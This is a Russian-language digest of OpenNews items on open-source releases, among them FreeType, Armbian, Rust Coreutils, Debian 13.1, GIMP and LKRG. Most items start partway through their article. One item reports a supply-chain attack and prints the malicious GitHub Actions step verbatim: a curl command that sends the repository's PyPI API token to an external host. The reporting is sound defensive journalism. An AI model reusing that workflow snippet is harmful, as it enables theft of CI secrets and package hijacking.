Среди изменений:

• Оптимизирован интерпретатор инструкций TrueType, который стал загружать глифы на 15% быстрее.
• Ускорена обработка вариативных шрифтов.
• На современных 64-разрядных платформах на 5-10% ускорена загрузка глифов TrueType и CFF.
• В драйвере BDF на 75% сокращено время загрузки шрифтов.
• В 3.5 раза возросла производительность обработки таблиц кернинга 'GPOS'.
• В авто-хинтере при небольших размерах символов улучшена отрисовка глифов тильды акцента и разделение диакритических и базовых глифов.
• Добавлен конфигурационный макрос "FT_CONFIG_OPTION_USE_HARFBUZZ_DYNAMIC" для динамической загрузки библиотеки компоновки глифов HarfBuzz.
• В полностью растровых шрифтах TrueType теперь игнорируется флагш FT_LOAD_NO_BITMAP и выполняется загрузка битовых карт вместо вывода ошибки.

1. Главная ссылка к новости
2. OpenNews: Уязвимость во FreeType, позволяющая выполнить код при обработке шрифтов
3. OpenNews: Релиз шрифтового движка FreeType 2.13
4. OpenNews: В Fedora 34 намечен перевод FreeType на HarfBuzz для улучшения хинтинга
5. OpenNews: Уязвимость во FreeType, эксплуатируемая через TTF-шрифт и затрагивающая браузеры
6. OpenNews: Браузер Chrome переведён на шрифтовой движок Skrifa, написанный на Rust

Для управления окнами в Budgie используется оконный менеджер Budgie Window Manager (BWM), являющийся расширенной модификацией базового плагина Mutter. Основу Budgie составляет панель, близкая по организации работы к классическим панелям рабочего стола. Все элементы панели являются апплетами, что позволяет гибко настраивать состав, менять размещение и заменять реализации основных элементов панели на свой вкус. Среди доступных апплетов можно отметить классическое меню приложений, систему переключения задач, область со списком открытых окон, просмотр виртуальных рабочих столов, индикатор управления питанием, апплет управления уровнем громкости, индикатор состояния системы и часы.

Разработчики намеревались сформировать значительный релиз Budgie 10.10 в первом квартале 2025 года. В данном выпуске планировалось полностью отказаться от поддержки X11 и оставить только возможность работы в окружениях на базе протокола Wayland. Тем не менее, данная ветка всё ещё не готова к релизу, одним из критериев для которого упоминалось достижение паритета в функциональности апплетов со старым окружением на базе X11. После релиза Budgie 10.10, серию 10.x переведут в режим сопровождения, а все ресурсы направят на развитие ветки Budgie 11, примечательной отделением функциональности рабочего стола от слоя, обеспечивающего визуализацию и вывод информации.

Обновление Budgie 10.9.3 примечательно синхронизацией c изменениями в грядущем релизе GNOME 49, запланированном на 17 сентября. Для управления настройками в Budgie применяется компонент gnome-settings-daemon, в который в GNOME 49 внесены изменения, нарушающие обратную совместимость. Из плагина Power в GNOME Shell перенесён код для управления подсветкой экрана, а из плагина MediaKeys - код поддержки мультимедийных клавиш изменения яркости. Также из gnome-settings-daemon удалён плагин для графических планшетов Wacom, функциональность которого теперь интегрирована в композитный менеджер Mutter.

Для обеспечения работы после урезания функциональности разработчики Budgie создали форк gnome-settings-daemon, нацеленный на сохранение старого состояния компонентов MediaKeys, Power и Wacom. За исключение данных компонентов, которые поставляются в форме отдельных плагинов (bsd-media-keys, bsd-power и bsd-wacom), и возвращения desktop-файлов для их автозапуска, остальной код gnome-settings-daemon полностью синхронизирован с кодовой базой GNOME. Из изменений в самом Budgie отмечается адаптация к новому API библиотеки libxfce4windowing, изменениям в обработке клавиши "overlay-key" (по умолчанию "Super") в композитном менеджере Mutter и удалению компактных классов в Vala 0.56.18.

1. Главная ссылка к новости
2. OpenNews: В среде рабочего стола Budgie 10.10 будет оставлена только поддержка Wayland
3. OpenNews: Выпуск среды рабочего стола Budgie 10.9 с начальной поддержкой Wayland
4. OpenNews: Выпуск окружения рабочего стола Budgie 10.8
5. OpenNews: План развития пользовательского окружения Budgie после превращения в независимый проект
6. OpenNews: Рабочий стол Budgie переходит с GTK на библиотеки EFL от проекта Enlightenment

Для формирования сборок используются пакетные базы Debian и Ubuntu, но все компоненты полностью пересобирается при помощи собственной сборочной системы с включением оптимизаций для уменьшения размера, увеличения производительности и применения дополнительных механизмов защиты. Например, раздел /var/log монтируется с использованием zram и хранится в ОЗУ в сжатом виде со сбросом данных на накопитель раз в день или при завершении работы. Раздел /tmp монтируется при помощи tmpfs.

Проектом поддерживается более 30 вариантов сборок ядра Linux для разных платформ ARM и ARM64. Предоставляется SDK для упрощения создания своих системных образов, пакетов и редакций дистрибутива. Для подкачки используется ZSWAP. При входе по SSH предоставляется опция для использования двухфакторной аутентификации. В состав входит эмулятор box64, позволяющий запускать программы, собранные для процессоров на базе архитектуры x86. Предлагаются готовые пакеты для запуска пользовательских окружений на базе KDE, GNOME, Budgie, Cinnamon, i3wm, Mate, Xfce и Xmonad.

Основные изменения в Armbian 25.8:

• Обеспечена официальная поддержка плат Mekotronics R58 HD и NanoPi R3S LTS.
• Добавлена поддержка плат, сопровождаемых сообществом: CAINIAO CNIoT-CORE, KickPi K2B, Radxa Cubie A5E, Banana Pi R4 и Orange Pi 5 Pro.
• Ядро Linux для большинства плат обновлено до версии 6.16 в ветках EDGE. В ветках STABLE используется ядро 6.12 LTS. Обновлён загрузчик U-Boot 2025.07 и инструментарий ATF 2.13 (Arm Trusted Firmware).
• Добавлена поддержка релиза Debian 13, проведена стабилизация сборок на базе Debian 13.
• В сборочный инструментарий добавлена поддержка архитектуры LoongArch64.
• Продолжено развитие утилиты armbian-config, применяемой для настройки системы после установки. Улучшена поддержка VPN WireGuard, расширены настройки связанные с маршрутизацией в локальных сетях и конфигурированием клиентских систем. Улучшена интеграция с системой блокирования рекламы Pi-hole.
• Включена поддержка термодатчиков для платы Rock-5C.
• Добавлена поддержка звуковой подсистемы платы RockPi-S.
• Налажена работа Wake-on-LAN на платах Helios4.
• Улучшены драйверы для плат Realtek RTL8822CS, Innosilicon USB3 PHY и NanoPi M6.
• Решены проблемы с подключением экранов через интерфейс DSI (Display Serial Interface) на платах Raspberry Pi 5.

Дополнительно можно отметить формирование выпуска DietPi 9.16, дистрибутива для одноплатных ПК на базе архитектур ARM и RISC-V, таких как Raspberry Pi, Orange Pi, NanoPi, BananaPi, BeagleBone Black, Rock64, Rock Pi, Quartz64, Pine64, Asus Tinker, Odroid и VisionFive 2. Дистрибутив построен на пакетной базе Debian и доступен в сборках для более, чем 50 плат. DietPi также может применяться для создания компактных окружений для виртуальных машин и обычных ПК на базе архитектуры x86_64. Сборки для плат отличаются небольшим размером (в среднем 130 МБ) по сравнению с Raspberry Pi OS и Armbian. Инструментарий для сборки и сопровождения дистрибутива распространяется под лицензией GPLv2.

Проект оптимизирован для минимального потребления ресурсов и развивает несколько собственных утилит: интерфейс для установки приложений DietPi-Software, конфигуратор DietPi-Config, система резервного копирования DietPi-Backup, механизм ведения временных логов DietPi-Ramlog (также поддерживается rsyslog), интерфейс для установки приоритетов выполнения процессов DietPi-Services и система доставки обновлений DietPi-Update. Утилиты предоставляют консольный интерфейс пользователя с меню и диалогами на базе whiptail. Поддерживается режим полной автоматизации установки, позволяющий провести инсталляцию на платы без участия пользователя.

Среди изменений в DietPi 9.16:

• Добавлена начальная поддержка будущего выпуска Debian 14, развитие которого началось в ветке Debian Testing. Началось формирование сборок на базе Debian 14.
• При выполнении операций с пакетами убран запуск команды обновления индексов "apt update", если /etc/apt/sources.list и специфичные для архитектур индексы изменялись менее часа назад.
• В скриптах и функциях G_* при необходимости выполнения привилегированных операций реализован встроенный перезапуск с использованием sudo, не требующий ручного ввода команд в форме "sudo dietpi-software".
• В сборках для плат Raspberry Pi при первой загрузке теперь по умолчанию активируется адаптер UART.
• Для плат ROCK Pi S добавлены настройки для переключения порта USB-C между режимами USB-хоста и OTG.
• В утилите dietpi-software для систем на базе архитектуры RISC-V реализованы опции для использования Docker Compose, Snapcast и Amiberry. Для всех архитектур и версий Debian добавлена возможность установки системы домашней автоматизации Domoticz. В сборки для Raspberry Pi на базе Debian 12 добавлен пакет с медиацентром Kodi 21. Добавлена возможность установки Nextcloud Talk, Synapse и WireGuard в автоматическом режиме при первой загрузке.

1. Главная ссылка к новости
2. OpenNews: Выпуск Armbian 25.5 и DietPi 9.13, дистрибутивов для одноплатных компьютеров
3. OpenNews: Обновление дистрибутива OpenWrt 24.10.2
4. OpenNews: Для плат Raspberry Pi опубликован генератор системных образов rpi-image-gen
5. OpenNews: Новая версия дистрибутива Raspberry Pi OS

Rust Coreutils применяется в дистрибутивах AerynOS (Serpent OS) и Apertis, а также будет задействован по умолчанию в осеннем выпуске Ubuntu 25.10. В отличие от GNU Coreutils реализация на Rust распространяется под пермиссивной лицензией MIT, вместо копилефт-лицензии GPL. Дополнительно той же командой разработчиков развиваются написанные на Rust аналоги наборов утилит util-linux, diffutils, findutils и procps, а также программ sed и login.

В новой версии Rust Coreutils:

• Пакет признан полностью готовым для рабочего применения в Ubuntu. Устранены все проблемы, мешавшие переходу Ubuntu по умолчанию на Rust Coreutils.
• Добавлена поддержка локализации и интернационализации. Введена в строй инфрастурктура для поддержания переводов сообщений на разные языки. Учтены параметры локали при форматировании вывода и начат перевод на разные языки сообщений об ошибках. Для поддержки многоязычности задействована система локализации Fluent, развиваемая Mozilla и используемая в Firefox.
• Добавлена поддержка Unicode. Символы Unicode, в том числе emoji, теперь могут применяться при обработке содержимого и параметров, например, в качестве разделителей полей: 'echo "🍔🍟🥤" | cut -d"🍟" -f1').
• Проведена оптимизация производительности утилит tr, sort и cat. Производительность утилиты tr повышена в 15 раз - ранее данная утилита была медленнее GNU tr в 9.8 раз, а теперь быстрее в 1.58 раза.
• Улучшена совместимость с эталонным тестовым набором GNU Coreutils, при прохождении которого успешно выполнено 538 тестов (в прошлой версии 522), 52 (65) теста завершилось неудачей, а 27 (31) тест был пропущен.
• Улучшена совместимость с GNU Coreutils для утилит date, du, fmt, ls и sort.
• Расширены возможности, устранены проблемы и добавлены недостающие опции для утилит basenc, basename, cat, chmod, chown, cksum, cp, split, date, dd, du, echo, env, expr, factor, fold, hashsum, head, install, ln, logname, ls, mkdir, mkfifo, mktemp, more, mv, nice, nl, od, pr, printf, pwd, realpath, rm, shred, sort, stat, stdbuf, stty, sync, tail, tee, timeout, touch, tr, uname, unexpand, uptime, users и who.

1. Главная ссылка к новости
2. OpenNews: GCC-бэкенд достиг возможности полной раскрутки компилятора rustc. Выпуск Rust Coreutils 0.1.0
3. OpenNews: Выпуск утилит GNU grep 3.12, gzip 1.14, diffutils 3.12 и coreutils 9.7
4. OpenNews: В Ubuntu 25.10 решено заменить GNU Coreutils на uutils, написанные на Rust
5. OpenNews: Выпуск uutils 0.0.29, варианта GNU Coreutils на языке Rust
6. OpenNews: В Ubuntu по умолчанию задействован sudo-rs, написанный на Rust

Дистрибутив основан на пакетной базе Arch Linux, но оформлен в форме неделимого образа, не применяющего разбивку на отдельные пакеты, монтируемого в режиме только для чтения и обновляемого атомарно. Компоненты, помимо базового системного окружения, собраны из исходного кода при помощи kde-builder или поставляются в форме пакетов Flatpak. Дистрибутивом поддерживаются повторяемые сборки, позволяющие любому желающему верифицировать процесс сборки дистрибутива. Все пользовательские (/home) и изменяемые системные данные хранятся в зашифрованных разделах. В качестве загрузчика задействован systemd-boot, поддерживающий загрузку только в режиме EFI.

Для обновления используются два дисковых раздела - обновление загружается в пассивный раздел, который после перезагрузки становится активным, а прошлый активный раздел переводится в пассивный режим и ожидает установки следующего обновления. В случае возникновения проблем после установки обновления предоставляется возможность отката на прошлое состояние системы. Переключение между разными состояниями системы реализовано через механизм снапшотов Btrfs. Для установки обновлений с использованием атомарного механизма замены разделов применяется компонент systemd-sysupdate и утилита updatectl.

Система отделена от приложений - дополнительные приложения могут быть установлены в домашний каталог в форматах Flatpak, AppImage, Homebrew или Snap. Кроме того, в состав входят инструментарии Distrobox и Toolbox, позволяющие создавать в домашнем каталоге контейнеры для установки произвольных пакетов из других дистрибутивов. Пользователь также может использовать утилиту systemd-sysext для установки образов расширения системы (System Extension), содержимое которых накладывается на иерархию /usr/ при помощи OverlayFS.

Альфа выпуск продолжает развитие сформированной в начале августа редакции KDE Linux Testing Edition, рассчитанной на тестирование, контроль качества и отслеживание процесса разработки следующего релиза KDE. Редакция ориентирована на использование разработчиками KDE и пользователями, желающими принять участие в контроле качества, проверке новых возможностей и выявлении ошибок. В дальнейшем планируют сформировать редакцию для энтузиастов и опытных пользователей (Enthusiast Edition), предоставляющую доступ к самым свежим релизам и бета-версиям KDE Plasma, а также стабильную сборку (Stable Edition), предлагающую финальные релизы после проведения дополнительного тестирования и стабилизации.

Из ограничений альфа-версии отмечается поддержка только систем с UEFI, отсутствие возможности загрузки в режиме UEFI Secure Boot, невозможность загрузки новых модулей ядра во время работы, недоделанный интерфейс для обновления системы и приложений в формате Flatpak, отсутствие поддержки старых GPU NVIDIA (поддерживаются только GPU на базе микроархитектуры Turing (GTX 16xx) и новее так как лицензионные ограничения не позволяют включить в состав образа проприетарные модули с поддержкой старых GPU). Для работы доступен только графический сеанс на базе Wayland.

1. Главная ссылка к новости
2. OpenNews: Проект KDE развивает собственный дистрибутив KDE Linux
3. OpenNews: Проект KDE опубликовал дистрибутив KDE Linux Testing Edition
4. OpenNews: Выпуск KDE Gear 25.08, набора приложений от проекта KDE
5. OpenNews: В KDE появился мастер начальной настройки
6. OpenNews: Дистрибутив GNOME OS перешёл на стадию тестирования на реальном оборудовании

Из изменений в Debian 13.1 можно отметить обновление до свежих стабильных версий пакетов dpdk, galera, git, glib, gnome-online-accounts, gnome-shell, gssdp, libadwaita-1, librepo, mariadb, mozjs128, network-manager-openvpn, pcre2, postfix, postgresql, ptyxis, qemu, samba, systemd. Из дистрибутива удалён пакетный менеджер guix, который остался без сопровождения и содержит проблемы с безопасностью.

Для загрузки и установки "с нуля" в ближайшие часы будут подготовлены установочные сборки c Debian 13.1. Системы, установленные ранее и поддерживаемые в актуальном состоянии, получают обновления, присутствующие в Debian 13.1, через штатную систему установки обновлений. Исправления проблем безопасности, включённые в новые выпуски Debian, доступны пользователям по мере выхода обновлений через сервис security.debian.org.

Одновременно доступен новый выпуск предыдущей стабильной ветки Debian 12.12, в который включено 135 обновлений с устранением проблем со стабильностью и 83 обновления с устранением уязвимостей. Обновлены до свежих стабильных версий пакеты apache2, clamav, dpdk, galera, libsoup3, llvm-toolchain, mariadb, openssl, postgresql, rar, rustc-web, systemd, usb.ids, wireless-regdb. Удалён пакет guix.

1. Главная ссылка к новости
2. OpenNews: Релиз Debian 13
3. OpenNews: Релиз Debian GNU/Hurd 2025

GitHub Actions даёт возможность разработчикам кода прикреплять обработчики для автоматизации различных операций в GitHub. Например, при помощи GitHub Actions можно выполнить определённые проверки и тесты при совершении коммитов или автоматизировать обработку новых Issues. Вредоносный обработчик распространялся под именем "Github Actions Security" и включал в секции "run" команду "curl", отправляющую содержимое переменных окружения на внешний хост при запуске задач в окружении непрерывной интеграции. Вредоносный коммит добавлялся с учётных записей мэйнтейнеров проектов, которые, вероятно, до этого были взломаны или стали жертвой фишинга.

Атака выявлена после разбора аномальной активности, связанной с пакетом FastUUID, предоставляющим Python-обвязку над Rust-библиотекой UUID. Пакет FastUUID, для которого за последнюю неделю зафиксировано почти 1.2 миллиона загрузок, используется в качестве зависимости в популярном проекте LiteLLM, насчитывающем в PyPI более 5 миллионов загрузок в неделю. Анализ изменений в репозитории FastUUID показал, что 2 сентября мэйнтейнер проекта добавил коммит с новым обработчиком Github Action, в котором содержался код для отправки токена к репозиторию PyPI на внешний хост.

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'PYPI_API_TOKEN=${{ secrets.PYPI_API_TOKEN }}' https://bold-dhawan.45-139-104-115.plesk.page

Проблему удалось выявить до того как злоумышленники воспользовались перехваченным токеном - публикации вредоносных изменений или модифицированных версий пакета в PyPI для FastUUID не зафиксировано. Похожие подстановки Github Action выявлены ещё в 816 репозиториях, владельцам которых, а также администрации PyPI, GitHub, NPM и DockerHub, направлены уведомления. По состоянию на вчерашний вечер вредоносные коммиты были отменены примерно в 100 репозиториях. В настоящее время при поиске в GitHub определяется 671 коммит с вредоносным Github Action.

1. Главная ссылка к новости
2. OpenNews: Google представил проект OSS Rebuild для выявления скрытых изменений в пакетах
3. OpenNews: Компрометация GitHub Actions-обработчика changed-files, применяемого в 23 тысячах репозиториев
4. OpenNews: Ошибка в обработчике GitHub Actions привела к публикации вредоносных релизов Ultralytics
5. OpenNews: GitHub обновил GPG-ключи из-за уязвимости, приводящей к утечке переменных окружения
6. OpenNews: Атака на инфраструктуру PyTorch, компрометирующая репозиторий и релизы

Значительный прирост производительности достигается благодаря избавлению от накладных расходов, связанных с применением RPC в пространстве пользователя. Например, при использовании драйвера ntsync по сравнению с реализацией примитивов синхронизации NT в пространстве пользователя максимальный FPS в игре Dirt 3 увеличился на 678%, в игре Resident Evil 2 - на 196%, Tiny Tina's Wonderlands - на 177%, Lara Croft: Temple of Osiris - на 131%, Call of Juarez - на 125%, The Crew - на 96%, Forza Horizon 5 - на 48%, Anger Foot - на 43% (замеры сделаны в сравнении с wine-sync, не с esync/fsync).

Для задействования оптимизированных примитивов синхронизации в Wine необходимо включить модуль ядра ntsync, который отключён по умолчанию. Для активации автозапуска модуля ntsync при каждом перезапуске системы, можно добавить файл конфигурации /etc/modules-load.d/ntsync.conf, содержащий строку "ntsync" и перезапустить систему. Или для однократного запуска вручную загрузить модуль командой "sudo modprobe ntsync", но в таком случае после перезапуска системы, модуль придётся запускать вручную каждый раз заново. Для работы требуется как минимум ядро Linux 6.14.

Чтобы убедиться, что ntsync действительно работает, необходимо что-нибудь запустить в Wine. Например, достаточно выполнить команду "winecfg", после чего запустить "lsof /dev/ntsync" и убедиться, что в выводе присутствуют запущенные сейчас процессы wine, использующие ntsync. Например:

   $ lsof /dev/ntsync

   COMMAND      PID USER FD   TYPE DEVICE SIZE/OFF NODE NAME
   start.exe 658466 user 12r   CHR 10,260      0t0  630 /dev/ntsync
   services. 658474 user 11r   CHR 10,260      0t0  630 /dev/ntsync
   explorer. 658484 user 11r   CHR 10,260      0t0  630 /dev/ntsync
   winedevic 658499 user 10r   CHR 10,260      0t0  630 /dev/ntsync
   svchost.e 658552 user 10r   CHR 10,260      0t0  630 /dev/ntsync
   plugplay. 658557 user 10r   CHR 10,260      0t0  630 /dev/ntsync
   winedevic 658605 user 10r   CHR 10,260      0t0  630 /dev/ntsync
   conhost.e 658623 user 11r   CHR 10,260      0t0  630 /dev/ntsync
   winecfg.e 658625 user 11r   CHR 10,260      0t0  630 /dev/ntsync

1. Главная ссылка к новости
2. OpenNews: Arch Linux перешёл на 64-разрядные сборки Wine (WoW64)
3. OpenNews: Выпуск Wine-wayland 10.5
4. OpenNews: Новые версии Wine 9.2 и Winlator 5.0. Для ядра Linux предложен драйвер ntsync
5. OpenNews: Релиз ядра Linux 6.14
6. OpenNews: Выпуск Wine 10.14 и Wine staging 10.14

Среди изменений в GIMP 3.1.4:

• Добавлена поддержка слоёв-ссылок (Link layer), позволяющих прикрепить внешние файлы с изображениями в качестве отдельных слоёв. В GIMP к слоям-ссылкам применяется режим недеструктивного редактирования, т.е. манипуляции со слоями-ссылками не влияют на состояние привязанных исходных изображений.

  Например, если добавить SVG-файл как слой-ссылку, то после редактирования этого файла в векторном графическом редакторе Inkscape, содержимое слоя в GIMP будет автоматически синхронизировано с состоянием отредактированного файла. При этом если в GIMP отмасштабировать или повернуть содержимое слоя-ссылки, то данные изменения не повлияют на качество исходного изображения.

  В будущем планируют добавить возможность привязки не только целых изображений, но отдельных слоёв, т.е. как слои-ссылки можно будет привязать выбранные слои из отдельного XCF-файла.
  
  

• Добавлена поддержка векторных слоёв (Vector layer), позволяющих создавать фигуры с заданными свойствами заливки и обводки. Данные хранятся в векторном виде, что позволяет в любой момент изменить контуры фигур (path), выбрать другой цвет заливки или обводки и применить к слою инструменты трансформации в недеструктивном режиме. Для создания векторного слоя следует создать фигуру при помощи инструмента "Контуры" (Path) и нажать кнопку генерации векторного слоя для фигуры, после чего можно, например, повернуть или масштабировать векторный слой без потери качества исходной фигуры.
• Добавлен GEGL Filter Browser, интерфейс для навигации по фильтрам на базе библиотеки GEGL (Generic Graphics Library). При помощи GEGL Filter Browser можно посмотреть список доступных операций GEGL (фильтров) и информацию по их использованию.
• Добавлена поддержка нового формата кистей, задействованного в программе для цифровой живописи MyPaint 2.0. Движок для работы с кистями MyPaint теперь учитывает масштаб и поворот холста при рисовании, что позволяет более точно симулировать реальные мазки кистью. В состав GIMP добавлено более 20 новых кистей из набора Dieterle, входящего в состав MyPaint Brushes 2, включая кисти для рисования стрелок и постеризации.
• В инструмент для работы с кистями MyPaint добавлен ползунок "Усиление" (Gain), при помощи которого можно управлять реагированием на степень нажатия при рисовании, например, для симуляции более сильного или слабого нажатия на кисть при рисовании мышью.
• В инструменте для создания и редактирования текстовых слоев реализована поддержка комбинаций клавиш "Ctrl + B", "Ctrl + I" и "Ctrl + U" для применения жирного начертания, курсива и подчёркивания. Обеспечено изменение цвета контура текста в реальном времени сразу после изменения цвета в окне выбора цвета, не дожидаясь подтверждения выбора.
• Представлен новый интерфейс плагина Animation Playback, оформленный в стиле видеоплееров, таких как VLC. Вместо индикатора прогресса задействован слайдер, позволяющий переместится на нужный кадр.
• Учтены системные настройки для отключения анимированных эффектов.
• В полях для ввода значений с размером в диалогах настройки сетки и разрешения монитора разрешено использовать математические выражения, например, "3 * 92cm".
• Возобновлена возможность импорта изображений в формате HRZ, применяемого для сохранения данных SSTV.
• Добавлена поддержка импорта изображений в формате JPEG 2000 со знаковым представлением пиксельных данных, которые могут содержать отрицательные значения.
• Добавлена поддержка импорта текстур в формате PAA, применяемом в играх от компании Bohemia Interactive Studio.
• Добавлена поддержка импорта изображений в форматах SFW93A и SFW94A, применявшихся в Seattle Filmwork.
• Расширена поддержка формата TIFF, для которого реализована возможность загрузки данных о видимости слоёв, режимов смешивания и тегов цветов.
• Внесены изменения для упрощения в будущем портирования на GTK4. Например, осуществлён уход от использования GtkTreeView в пользу GtkListBox.
• Налажено формирование ночных сборок в формате snap для архитектур aarch64 и x86_64, а также в формате flatpak для архитектуры aarch64 (для x86_64 сборки формировались и раньше).

Дополнительно можно отметить анонс плагина Dream Prompter, встраивающего в GIMP интерфейс для генерации и редактирования изображений при помощи AI-модели Gemini 2.5 Flash Image Preview на основе определения задания на естественном языке. Код плагина написан на Python и распространяется под лицензией MIT.

1. Главная ссылка к новости
2. OpenNews: Выпуск графического редактора GIMP 3.1.2
3. OpenNews: Уязвимости в GNOME Help и GIMP, позволяющие выполнить код при открытии файлов
4. OpenNews: Обновление графического редактора GIMP 3.0.4
5. OpenNews: Релиз графического редактора GIMP 3.0.0

Пользователям 32-разрядных Linux-дистрибутивов рекомендуется перейти на использование 64-разрядных операционных систем. Для тех, кто не может оперативно обновить дистрибутив можно использовать ESR-ветку Firefox 140, обновления с устранением уязвимостей для которой будут формироваться как минимум до сентября следующего года. В Chrome поддержка 32-разрядных систем Linux была прекращена в 2016 году.

1. Главная ссылка к новости
2. OpenNews: Поддержка Firefox 115 ESR продлена до марта 2026 года
3. OpenNews: Релиз Firefox 142
4. OpenNews: Mozilla China прекращает предоставление сервисов для Firefox в Китае
5. OpenNews: Wayland использует менее 10% Linux-пользователей Firefox
6. OpenNews: Релиз web-браузера Chrome 49, прекративший поддержку 32-разрядных систем Linux

Модуль подходит как для защиты от атак, манипулирующих уже известными узявимостями в ядре Linux, так для противостояния эксплоитам, использующим ещё неизвестные уязвимости, если в них не применяются специальные меры для обхода LKRG. Защита основывается на выявлении несанкционированного внесения изменений в работающее ядро (проверка целостности) и отслеживании изменения полномочий пользовательских процессов (определение применения эксплоитов).

Проверка целостности выполняется на основе сравнения хэшей, вычисляемых для наиболее важных областей памяти и структур данных ядра, таких как IDT (Interrupt Descriptor Table), MSR, таблицы системных вызовов, все процедуры и функции, обработчики прерываний, списки загруженных модулей, содержимое секции ".text" модулей и атрибуты процессов. Процедура проверки активируется периодически по таймеру или при наступлении определённых событий в ядре, например, при выполнении системных вызовов setuid, setreuid, fork, exit, execve и do_init_module.

Определение возможного применения эксплоитов и блокирование атак производится на стадии до предоставления ядром доступа к ресурсам (например, до открытия файла), но после получения процессом несанкционированных полномочий (например, смена UID). При выявлении несанкционированного поведения процессов выполняется их принудительное завершение, чего достаточно для блокирования многих эксплоитов. Накладные расходы от работы модуля оцениваются в 2-2.5%.

Поддерживается работа на системах с архитектурами x86-64, AArch64 (ARM64), ARM32 и x86. Работа LKRG 1.0.0 протестирована с ядрами из различных дистрибутивов, начиная с ядра 3.10 из RHEL/CentOS 7 и заканчивая 6.17-rc4 из репозитория, в котором ведётся подготовка релиза Fedora 44. Пакеты доступны для дистрибутивов ALT Linux, Arch Linux, Astra Linux, Gentoo, Guix, NixOS, Rocky Linux, Whonix, Yocto и OpenBMC. Собранные для Rocky Linux пакеты можно использовать в RHEL 8/9 и производных дистрибутивах, таких как AlmaLinux 8/9, а пакеты для Whonix в Debian и Ubuntu.

Среди изменений в новой версии:

• Обеспечена совместимость с ядрами Linux вплоть до выпуска 6.17-rc4.
• При использовании с ядрами начиная с 6.13 прекращён перехват удалённых вызовов override_creds() и revert_creds(), что ограничило выявление атак, переопределяющих указатель cred. Ограничения попытались компенсировать через добавления проверок перезаписи указателя cred в других местах ядра.
• Прекращено излишнее отслеживание учётных данных для которых не производится проверка целостности. Изменение позволило сократить кодовую базу примерно на 1500 строк.
• Добавлена поддержка появившегося в ядре Linux 6.10 механизма для создания в ФС OverlayFS временных файлов, используя опцию O_TMPFILE (ovl_tmpfile). Указанная поддержка необходима для предотвращения ложных срабатываний, проявляющихся при использовании изолированных контейнеров на системах с ядрами 6.10-6.12.
• Для систем x86_64 добавлена поддержка технологии Intel CET (Control-flow Enforcement Technology) для защиты исполняемого кода с использованием инструкций IBT (indirect branch tracking), а также программной защиты kCFI (kernel Control Flow Integrity) для блокирования нарушения нормального порядка выполнения (control flow) в результате применения эксплоитов, изменяющих хранимые в памяти указатели на функции.
• Для подключения многих обработчиков вместо kretprobes задействован механизм kprobes, упрощающий код установки hook-ов и позволяющий добиться более высокой производительности.
• Переработана работа с блокировками (lock) данных в ядре, специфичных для процесса (per-task shadow data). За счёт исключения лишних блокировок удалось повысить производительность обращения к подобным данным.
• Устранены ошибки, приводившие к состоянию гонки, проблемам с проверкой целостности и ложным срабатываниям.
• Улучшена поддержка сборки с использованием Clang.

1. Главная ссылка к новости
2. OpenNews: Выпуск модуля LKRG 0.9.7 для защиты от эксплуатации уязвимостей в ядре Linux
3. OpenNews: Проект Openwall подготовил модуль для защиты от эксплуатации уязвимостей в ядре Linux
4. OpenNews: Проект OpenPaX развивает аналог механизмов защиты Grsecurity/PaX для ядра Linux
5. OpenNews: Проект по продвижению в ядро Linux новых технологий активной защиты
6. OpenNews: Проект grsecurity опубликовал реализацию механизма защиты RAP для ядра Linux

Это второй продукт компании Microsoft. Первым продуктом был Altair BASIC, код которого был опубликован Биллом Гейтсом весной этого года в честь 50-летия со дня основания компании Microsoft. В 1976 году Билл Гейтс и Рик Вейланд (Ric Weiland) подготовили порт Altair BASIC для микропроцессоров 6502, который был лицензирован компанией Commodore и поставлялся как Commodore BASIC в компьютерах Commodore PET, VIC-20 и Commodore 64.

Код BASIC для 6502 может представлять интерес для любителей ретрокомпьютеров, использующих эмуляторы и реализации на базе FPGA. Среди прочего, компания Commodore анонсировала модель Commodore 64 ULTIMATE на базе FPGA, начало продаж которого намечено на октябрь. В Commodore 64 ULTIMATE заявлена совместимость с более чем 10 тысячами ретро игр при таких возможностях, как передача игр по Wi-Fi, поддержка USB и режим ускорения для запуска новых игр.

1. Главная ссылка к новости
2. OpenNews: Microsoft открыл код GW-BASIC под лицензией MIT
3. OpenNews: Microsoft открыл код Windows Subsystem for Linux и текстового редактора Edit
4. OpenNews: Microsoft открыл код MS-DOS 1.25 и 2.0 под лицензией MIT
5. OpenNews: Microsoft и IBM открыли код операционной системы MS-DOS 4.0
6. OpenNews: Билл Гейтс опубликовал код первого продукта Microsoft

В соответствии cо статистикой Mozilla ощутимое число пользователей Firefox продолжают использование Windows 7, несмотря на прекращение компанией Microsoft сопровождения данных операционных систем с января 2020 года. В Google Chrome поддержка Windows 7 и Windows 8 была прекращена в феврале 2023 года, поэтому Firefox остаётся единственным значительным браузером с поддержкой Windows 7/8.

1. Главная ссылка к новости
2. OpenNews: Поддержка Firefox 115 ESR продлена до сентября 2025 года. Обновление Firefox 135.0.1
3. OpenNews: Mozilla продлила поддержку ESR-ветки Firefox 115 до марта 2025 года
4. OpenNews: Релиз Firefox 115
5. OpenNews: Релиз Firefox 140
6. OpenNews: Релиз Firefox 142

Основные изменения в Linux Mint 22.2:

• В состав включено новое приложение Fingwit для настройки аутентификации по отпечаткам пальцев. Программа определяет наличие сканера отпечатков пальцев, позволяет записать отпечатки пользователя и активировать их использование для входа в систему (опционально), разблокировки хранителя экрана, выполнения привилегированных операций через pkexec и запуска команд при помощи утилиты sudo.
• Улучшена совместимость с приложениями, использующими библиотеку libAdwaita. В состав включена модифицированная версия libAdwaita, корректно работающая с темами оформления o Mint-Y, Mint-X и Mint-L, применяемыми в Linux Mint.
• В пакет xdg-desktop-portal-xapp, содержащий компоненты для интеграции со средой рабочего стола изолированных libAdwaita-приложений (например, поставляемых в пакетах flatpak), добавлена поддержка акцентных цветов, применяемых для выделения активных элементов. Значения подобных цветов определяются через сканирование GTK-тем на наличие цвета с идентификатором "accent_color".
• Представлена библиотека libAdapta, созданная как форк libAdwaita, поддерживающий темы оформления. Приложения, собранные с libAdapta, при запуске в средах рабочего стола, поддерживающих выбор темы оформления, подхватывают настройки тем и используют соответствующие им элементы интерфейса. Библиотека использует иной набор файлов со стилями, размещаемый в подкаталоге libadapta-* в теме оформления. Если данный подкаталог отсутствует, то выполняет откат на набор стилей libAdwaita. Для совместимости с libAdwaita предоставляется отдельный заголовочный файл, позволяющий легко переключаться между libAdwaita и libAdapta без внесения изменений в код.
